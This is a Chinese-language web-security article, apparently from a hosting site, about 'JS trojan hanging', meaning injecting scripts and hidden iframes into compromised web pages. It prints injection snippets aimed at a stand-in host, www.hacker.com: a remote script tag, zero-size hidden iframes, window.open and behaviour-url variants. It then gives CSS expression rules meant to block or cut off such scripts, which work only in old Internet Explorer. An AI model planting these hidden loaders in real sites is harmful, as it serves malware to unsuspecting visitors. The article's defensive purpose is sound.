這種方法使用的關(guān)鍵代碼如下：
window.open("http://www.hacker.com/木馬.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
這種代碼往往很長，很容易被安全工程師發(fā)現(xiàn)，而且沒有經(jīng)驗的黑客也喜歡將“width”和“height=”參數(shù)設(shè)為“0”，但是設(shè)置為0后，可能會出現(xiàn)惡意代碼不運行的情況。
另外一種JS掛馬方式是，黑客先將掛馬腳本代碼“document.write('＜Iframe src="網(wǎng)頁木馬地址" ></iframe＞')”，寫入Windows中的寫字板另存為后綴為.js的腳本文件，并上傳到自己指定的網(wǎng)址。這時黑客只需要在受害者的網(wǎng)站中寫入：
<script src="http://www.hacker.com/木馬腳本.js"></script>
或者
document.write("<div style='display:none'>")
document.write("<iframe src="網(wǎng)頁木馬地址" width="0" height="0" scrolling="no" frameborder="0"></iframe>")
document.write("</div>")
就成功地將木馬掛到了對方的網(wǎng)頁中了。
小提示：黑客還可以根據(jù)情況隨機變換插入的JS掛馬方法，例如黑客有可能會將腳本寫為：
<div style="behaviour: url(http://www.hacker.com/木馬腳本.js);">
或者：
<iframe src="vbscript:[掛馬腳本]">
等等……
防第一種JS掛馬方式，不方便，用得非常少，而第二種JS掛馬方式才是當前主流的，所以我們主要針對它進行防御。方法就是阻止Src請求的異地外域的JS腳本，代碼如下：
iframe{mdy1:expression(this.src='about:blank',this.outerHTML='');}
script{mzm2:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木馬被成功隔離!'):'');}
不過這種方法的缺點就是網(wǎng)站的訪問者將不能看到被掛了JS木馬的相關(guān)網(wǎng)頁。
所以我們?yōu)榘踩こ處熖峁┝艘欢慰梢灾兄笿S腳本運行的CSS代碼，這段代碼會讓異地外域的JS文件在使用document.write()時，被document.close()強制關(guān)閉。這個時侯JS掛馬的內(nèi)容往往還沒有來得及寫完，只有部分被強制輸出了，Writer后面的內(nèi)容再不會被寫入訪問者的電腦中，從而起到防范JS腳本掛馬的作用。
讓JS木馬的進程迅速中止
在 <head> </head> 之間加入如下代碼:
屏蔽script和iframe
<style type="text/css" id="LinrStudio">
/*<![CDATA[*/
iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}
/*]]>*/
</style>
單屏蔽script
<style type="text/css" id="LinrStudio">
/*<![CDATA[*/
/*iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}*/
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}
/*]]>*/
</style>

上面的代碼經(jīng)本站測試，代碼是根據(jù)查找http一般情況下大家寫的js路徑，是帶有域名的，例如本站使用的就是http://img.jb51.net/1.js那么也是無法運行的，所以上面的代碼有一定的局限性。大家可以根據(jù)需要修改。
例如我們的地址都是img.jb51.net那么可以寫成
script{ngz1:expression((this.src.indexOf('jb51.net')==-1)?document.close():'');}
那么我們需要的就是將我們所以的js都寫成帶http://img.jb51.net的。如果你有更好的方法可以發(fā)布下。下面是我們給出的可能需要多重判斷
script{ngz1:expression(((this.src.indexOf('jb51.net')==-1)&&this.src.indexOf('http')==0)?document.close():'');}

國外服務(wù)器租用

版權(quán)聲明：本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學習參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。